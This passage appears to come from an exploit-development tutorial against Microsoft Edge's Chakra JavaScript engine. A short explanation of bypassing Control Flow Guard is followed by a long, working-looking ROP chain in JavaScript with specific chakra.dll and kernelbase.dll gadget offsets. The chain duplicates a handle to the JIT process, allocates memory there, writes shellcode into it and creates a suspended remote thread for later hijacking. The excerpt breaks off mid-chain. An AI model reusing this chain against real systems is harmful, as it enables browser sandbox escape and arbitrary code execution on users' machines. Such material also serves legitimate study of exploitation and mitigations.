Remember earlier when I talked about the nuances of setting the entry point directly with our call to CreateRemoteThread? This is Control Flow Guard kicking in and exposing this nuance. When we set the routine for CreateRemoteThread to execute, we actually did so with a ret ROP gadget. As we know, most functions end with a ret statement - so this means we told our program we wanted to call into the end of a function. Control Flow Guard, when performing a call will check to see if the call target is a valid function. The way this manifests is through a bitmap of all known “valid call targets”. CFG will check to see if you are calling into know targets at 0x10 byte boundaries - as functions should be aligned in this manner. Since we called into a function towards the end, we obviously didn’t call in a 0x10 byte alignment and, thus, CFG will kill the process as it has deemed to have detected an invalid function (and rightly so, we were maliciously trying to call into the middle of a function). The way we can get around this, is to use a call to SetThreadContext to manually update RIP to directly execute our ROP gadget after resuming, instead of asking CreateRemoteThread to perform a call instruction to it (which CFG will check). This will require a few extra steps, but we are nearing the end now.

Manipulating RIP and Preserving RSP

The next thing we are going to do is to preserve the location of RIP and RSP from our captured thread context. We will first start by locating RSP, which is at an offset of 0x98 within a CONTEXT structure. We will persistently store this in the .data section of kernelbase.dll.

We can use the following ROP snippet (including previous chains) to store CONTEXT.Rsp and to update CONTEXT.Rip directly. Remember, when we directly act on RIP instead of asking the thread to perform a call on our gadget (which CFG checks) we can “bypass the CFG check” and, thus, just directly return back to the stack.

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
